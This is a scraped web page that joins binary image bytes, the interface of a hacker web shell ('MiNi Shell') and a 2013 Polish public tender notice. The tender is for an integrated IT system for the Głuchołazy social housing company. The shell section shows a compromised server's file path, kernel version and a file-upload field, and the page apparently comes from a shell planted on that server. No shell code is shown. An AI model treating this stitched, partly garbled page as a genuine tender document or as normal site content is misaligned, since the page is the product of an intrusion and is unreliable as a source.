JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131008/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131008/208131-N-2013.html

<p class="kh_header"><b>Głuchołazy: Dostawa,  wdrożenie i obsługa  powdrożeniowa Zintegrowanego Systemu Informatycznego  (  w  skrócie  ZSI  )   na potrzeby Głuchołaskiego Towarzystwa Budownictwa Społecznego Sp. z o.o.  w  Głuchołazach   (  w  skrócie  GTBS)</b><br>
<b>Numer ogłoszenia: 208131 - 2013; data zamieszczenia: 08.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Głuchołaskie Towarzystwo Budownictwa Społecznego Sp. z o.o. , Plac Basztowy 3, 48-340 Głuchołazy, woj. opolskie, tel. 077 4092631, faks 077 4092631.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.tbs.glucholazy.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka  prawa handlowego  ze 100% udziałem Gminy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa,  wdrożenie i obsługa  powdrożeniowa Zintegrowanego Systemu Informatycznego  (  w  skrócie  ZSI  )   na potrzeby Głuchołaskiego Towarzystwa Budownictwa Społecznego Sp. z o.o.  w  Głuchołazach   (  w  skrócie  GTBS).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres zamówienia: 
A.  Dostarczenie i zainstalowanie oprogramowania użytkowego z bezterminowymi  licencjami dla  30 równoczesnych użytkowników - Zintegrowanego Systemu Informatycznego do zarządzania (zwanego dalej ZSI), wykonanego w technologii bazodanowej SQL, który powinien obejmować następujące zagadnienia:
     1.Księgowość i finanse w tym obsługa  kasy i banków
  2.Rozrachunki i windykacja należności
  3.Rozliczenie wspólnot mieszkaniowych
  4.Obsługa opłat czynszowych
  5.Rozliczenie mediów 
  6.Ewidencja środków trwałych
  7.Gospodarka Magazynowa
  8.Kadry-Płace
  9.Obsługa sprzedaży
  10.Centralna ewidencja zasobów
  11.Biuro obsługi klienta i rejestracja korespondencji
  12.Obsługa wydziału remontowego.


A.1.Ogólne wymagania funkcjonalne. 
Oferowany System Informatyczny musi być kompleksowy i charakteryzować się następującymi ogólnymi cechami:
1.	ZSI musi być systemem w pełni zintegrowanym, pracującym na jednej - wspólnej dla wszystkich użytkowników - platformie programowej   i bazie danych, umożliwiającym dostęp do informacji bezpośrednio po jej wprowadzeniu w różnych przekrojach i szybki podgląd z różnych poziomów i przez różnych użytkowników;
2.	Wszystkie moduły programowe oferowanego ZSI muszą pochodzić od jednego producenta oprogramowania.
3.	ZSI musi być oparty o nowoczesną serwerową technologię bazodanową SQL, zapewniającą pełną ochronę danych, ciągłą archiwizację oraz pełny wielodostęp;
4.	ZSI musi być wyposażony w polskojęzyczny interfejs (wszystkie komunikaty, menu, raporty, pomoc kontekstowa, okna do wprowadzania danych, podpowiedzi, zapytania, instrukcje dla użytkownika i inne).
5.	Interfejs użytkownika ZSI musi umożliwiać pracę w środowisku MS WINDOWS;
6.	ZSI musi spełniać aktualnie obowiązujące wymogi polskiego prawa, ustawy o własności lokali, o rachunkowości i rozliczeniach podatkowych oraz ustawy o ochronie danych osobowych;
7.	ZSI musi być systematycznie aktualizowany, zgodnie ze zmieniającymi się przepisami; 
8.	ZSI musi przechowywać dane historyczne (zapis nowej informacji nie może spowodować utraty dotychczasowej informacji; poprzednia wartość musi być zapamiętana wraz z okresem, w którym obowiązywała).
9.	ZSI musi być oparty o jedną, wspólną dla wszystkich użytkowników systemu bazę danych źródłowych, takich jak słowniki: ulic, nieruchomości, budynków, obiektów, liczników, płatników, banków, komórek organizacyjnych, zleceń, pracowników, itp. 
10.	ZSI ma pracować w technologii Klient-Serwer z możliwością równoczesnego korzystania z bazy danych przez wielu użytkowników, w tym użytkowników pracujących poza siedzibą firmy.
11.	Przejście z jednego modułu do drugiego (w ramach uprawnień użytkownika) następuje bez konieczności ponownego logowania się do następnego modułu - dostęp do wszystkich przyznanych użytkownikowi zasobów systemu ma być zapewniony po jednokrotnym wpisaniu identyfikatora (nazwy) użytkownika i jego hasła.
12.	ZSI musi umożliwiać pracę zdalną w trybie on-line na bazie danych serwera ze stanowisk zlokalizowanych poza siedzibą GTBS;
13.	Musi przechowywać informacje o użytkowniku dokonującym modyfikacji (co najmniej ostatniej) konkretnego dokumentu, oraz datę i dokładny czas wykonania tej operacji;
14.	Musi zapewnić dokładne określenie praw dostępu poszczególnych użytkowników systemu do poszczególnych grup danych oraz operacji, jakie może na nich wykonać (wprowadzanie, aktualizacja, przeglądanie, usuwanie); 
15.	System musi mieć możliwość pełnej archiwizacji danych oraz możliwość łatwego odtworzenia danych w razie awarii.
16.	Okna prezentujące dane w postaci tabelarycznej muszą być wyposażone w funkcjonalności sortowania według wybranych kolumn oraz zakładania przez użytkownika filtra wyświetlanej zawartości.
17.	System musi umożliwiać wykonywanie wydruków na dowolnym urządzeniu drukującym zainstalowanym w środowisku Windows.
18.	ZSI musi posiadać zabezpieczenia przed skasowaniem danych, które są powiązane z innymi danymi w systemie lub ich ostateczność została potwierdzona w inny sposób - poprzez odpowiednio wysoki status, przynależność do już zamkniętego miesiąca, itp.
19.	System musi posiadać mechanizmy kontroli spójności wprowadzanych danych, w tym wymuszanie pól obowiązkowych.
20.	Musi umożliwiać budowanie raportów samodzielnie przez użytkownika, wraz z możliwością ograniczania dostępu innym użytkownikom do poszczególnych raportów w zakresie podglądu, edycji i usuwania. Wymagane jest, aby razem z systemem zostały dostarczone narzędzia umożliwiające samodzielne tworzenie zestawień przez użytkowników; 
21.	Musi mieć możliwość wprowadzania samodzielnie przez użytkownika nowych pól do kartotek bazy danych, składników czynszowych i płacowych oraz nowych słowników, bez potrzeby wzywania konsultanta Wykonawcy. Wprowadzane informacje w nowych polach muszą być obsługiwane przez oprogramowanie w zakresie doboru danych do przeglądania, lub wydruków wg kryteriów zadanych przez użytkownika;
22.	Musi współpracować z pakietem pracy biurowej MS Office oraz  Oppen Office ; przekazywanie wybranych fragmentów tabel z danymi, lub tekstów do wymienionych programów  powinno być dostępne dla użytkownika poprzez funkcję -kopiuj do schowka-, lub inny równie prosty w obsłudze sposób;
23.	Musi umożliwiać automatyczne generowanie sprawozdań wymaganych przepisami, w formacie dokumentów wymaganym przez instytucje zewnętrzne (Urząd Skarbowy, ZUS ) a w obszarach dopuszczonych przez organy państwowe - także w postaci e-deklaracji;
24.	System ma umożliwiać bezproblemową zmianę na walutę Euro, w przypadku przystąpienia Polski do unii monetarnej.
25.	Musi mieć opracowany zestaw dokumentacji zawierający instrukcje obsługi dla użytkowników oprogramowania w postaci podręczników w języku polskim.
     26.   ZSI  poza  posiadanymi  wymaganiami  funkcjonalnymi  , musi posiadać   narzędzia  i   funkcjonalności  potocznie  uznawane  za   standardowe  oraz  charakterystyczne   i obligatoryjne  dla   specyfiki  prowadzonej  przez  GTBS  działalności .
      27.   ZSI  musi posiadać   możliwość  rozbudowy  o  dodatkowe  moduły  , posiadać   system kontroli  uprawnień  użytkowników  i zapewniać  ochronę  danych  
     28.   ZSI  ma  umożliwiać   dostęp  wraz  z przesyłem   danych  ze  zdalnego  stanowiska   użytkownika  


B.	Dostarczenie i zainstalowanie bazy danych, niezbędnej do uruchomienia ZSI,z licencjami dla 30 równoczesnych użytkowników. 
Wymagana licencja na bazę danych udzielona zamawiającemu, na okres nie krótszy niż 2 lata.
Dostawa, instalacja i konfiguracja niezbędnego środowiska informatycznego obejmującego:
1. oprogramowanie systemowe,
2. oprogramowanie bazodanowe,
3. inne oprogramowanie narzędziowe i administracyjne niezbędne do uruchomienia i prawidłowej eksploatacji ZSI,
4. dostarczenie wraz z systemami wszelkich niezbędnych licencji.
    Przedmiotem zamówienia jest  również  przeniesienie istniejących   baz  danych do nowego ZSI.
C.   Dobór i  dostarczenie   serwera  z oprogramowaniem w języku polskim  do  proponowanego  ZSI.
D.	Nadzór nad wdrażaniem ZSI obejmujący:
1.	wykonanie analizy przedwdrożeniowej ,  przedstawienie   harmonogramu   wdrażania  ZSI,
2.	instalację oprogramowania na serwerze i stacjach roboczych,
3.	parametryzację ZSI,
4.	przeniesienie  i  konwersję danych z dotychczasowych programów Zamawiającego do ZSI,
5.	szkolenia  stanowiskowe  dla użytkującego personelu  oraz szkolenie pracowników w zakresie administrowania oprogramowaniem  ,
6.	przetwarzanie testowe.
E.	Powdrożeniowa obsługa informatyczna w zakresie eksploatacji ZSI  w okresie 36 miesięcy od zakończenia  wdrożenia .      Przedmiot  zamówienia powinien obejmować dostawę bezterminowej licencji na oprogramowanie  ZSI lub zapis , że oprogramowanie staje  się  własnością GTBS.
Szczegółowy opis  przedmiotu  zamówienia zostanie doprecyzowany po przeprowadzeniu negocjacji.Wskazane  jest  aby Wykonawca  zapoznał  się  z  siecią  komputerową  i uwarunkowaniami technicznymi Zamawiającego..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 72.26.30.00-6, 48.61.20.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1). Zamawiający przewiduje konieczność wniesienia wadium w wysokości  4 600,00 zł ( cztery tysiące sześćset zł).
2) Wadium należy wnieść na etapie składania końcowej oferty po przeprowadzonych
negocjacjach.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykazać doświadczenie w wykonaniu w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o        udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, w zrealizowaniu minimum 5 zakończonych sukcesem wdrożeń zintegrowanych systemów informatycznych w języku polskim do zarządzania przedsiębiorstwem zarządzającym   lub administrującym min.  3 000 lokalami  , przy czym:
-	przez wdrożenie zakończone sukcesem rozumie się usługę wykonaną w terminie, zgodnie z zamówioną funkcjonalnością w przedsiębiorstwie  zajmującym  się  administrowaniem  lub zarządzaniem  nieruchomościami ,
-	wartość kontraktu jednostkowego obejmującego cenę licencji i cenę  wdrożenia systemu ( bez ceny sprzętu komputerowego , serwera , usługi powdrożeniowej ) wynosiła co najmniej 60 000   zł  - sześćdziesiąt  tysięcy  zł - ( tu należy wpisać wartość  zamówienia ) ,
-	każde z powyższych wdrożeń dotyczyło co najmniej 10 jednocześnie pracujących stanowisk komputerowych,
W  przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał kadrowy oraz łączne  doświadczenie  .</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) W  celu   wykazania  , że  oferowane usługi odpowiadają wymaganiom określonym przez Zamawiającego:
Wykonawca wykaże się posiadaniem certyfikatu ISO lub innego zaświadczenia podmiotu uprawnionego do kontroli jakości, potwierdzającego, że Wykonawca spełnia określone wymogi jakościowe w zakresie świadczenia usług będących przedmiotem zamówienia.


W celu potwierdzenia spełnienia niniejszego warunku Wykonawcy zobowiązani są przedłożyć kopię  wymienionego dokumentu , potwierdzonego za zgodność z oryginałem przez osobę uprawnioną do składania oświadczeń woli w imieniu Wykonawcy  (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniana będzie ich łączna sytuacja ,w tym celu dokumenty ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich  wykazywać będą spełnienie tego warunku)
 

2)Polisa  ( aktualna  ) na  ubezpieczenie  odpowiedzialności  cywilnej  Wykonawcy  musi  opiewać  na  kwotę  minimum  1 000 000 zł ( jeden milion zł).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> negocjacje z ogłoszeniem.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 5.</p>
<p class="bold">Opis sposobu dokonywania wyboru wykonawców, którzy zostaną zaproszeni do składania ofert, gdy liczba wykonawców spełniających warunki udziału w postępowaniu będzie większa niż określona w ogłoszeniu o zamówieniu</p>
<p>Znaczenie  wyboru Wykonawców , którzy zostaną  zaproszeni  do udziału w  postępowaniu.
Do  składania  ofert  wstępnych  zostaną  zaproszeni Wykonawcy   spełniający  postawione  warunki udziału w  postępowaniu  oraz  : a) Wykonawca  , który  wykaże  się  wykonaniem minimum  5 usług  polegających  na  wdrożeniu oprogramowania  w  przedsiębiorstwie  administrujacym  lub zarzadzającym minimum 3 000 lokalami  , b) za kazde  następne wdrożenie  oprogramowania  w przedsiębiorstwie administrujacym  lub zarzadzającym minimum 3 000 lokalami  Zamawiający  przezna  dodatkowo  1  pkt.  W  przypadku  jednakowej  liczby punktów  otrzymanych  przez  dwóch  lub większą  liczbę  Wykonawców  , kolejność  wniosków  bedzie  ustalana  na  podstawie  sumy  ilości  wszystkich  lokali , które  podlegały  wdrożeniu  oprogramowania  przedstawionego przez Wykonawcę.</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 55</li>
<li>2 - Funkcjonalność  oprogramowania - 45</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> Na tym etapie postępowania  Specyfikacja  Istotnych Warunków Zamówienia nie występuje.<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Na tym  etapie  postępowania  Specyfikacja  Istotnych  Warunków  Zamówienia  nie  występuje..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.10.2013 godzina 12:00, miejsce: Głuchołaskie  Towarzystwo Budownictwa  Społecznego  Sp. z  o.o.
48-340 Głuchołazy ul. Plac  Basztowy  3
-Sekretariat Ip..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zaleca  się  aby Wykonawcy   składali  wniosek  o dopuszczenie  do  udziału w  postępowaniu   na  wzorze  opracowanym   przez Zamawiającego , dostępnym na  stronie  internetowej  www.bip.tbs.glucholazy.pl  (druk  wniosku jest załącznikiem
do ogłoszenia  o wszczęciu  przedmiotowego postępowania ).
Informacje  dotyczące  wniosku o dopuszczenie  do  udziału  w negocjacjach z ogłoszeniem :
1) wniosek o dopuszczenie  do udziału w  negocjacjach  z ogłoszeniem  musi być  złożony w formie pisemnej do terminu określonego w ogłoszeniu o zamówieniu ,
2) wniosek o dopuszczenie  do  udziału w  negocjacjach z ogłoszeniem należy  złożyć w trwale   zamkniętym opakowaniu ( kopercie )  , uniemożliwiającym jego niezniszczalne otwarcie i zapoznanie  się  z treścią  oferty  przed upływem terminu  składania  wniosków. 
3) Opakowanie powinno być  oznakowane  w następujący sposób : Wniosek o dopuszczenie do udziału w  negocjacjach  z  ogłoszeniem  na  zadanie  pn. :  Dostawa,  wdrożenie i obsługa  powdrożeniowa Zintegrowanego Systemu Informatycznego  (  w  skrócie  ZSI  )   na potrzeby Głuchołaskiego Towarzystwa Budownictwa Społecznego Sp. z o.o.  w  Głuchołazach   (  w  skrócie  GTBS) 

 Nie  otwierać przed  23.10.2013. do godz. 12.00.
4) Opakowanie  wpowinno być opatrzone  pieczęcią  firmową  Wykonawcy wraz  z adresem i numerem telefonu.
5)Wszystkie wymagane  dokumenty składające  się  na Wniosek  o dopuszczenie  do udziału w  negocjacjach  z ogłoszeniem powinny być   przedstawione  w formie  oryginału  lub kopii poświadczonych  za zgodność  z  oryginałem przez Wykonawcę lub upełnomocnionych przedstawicieli Wykonawcy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com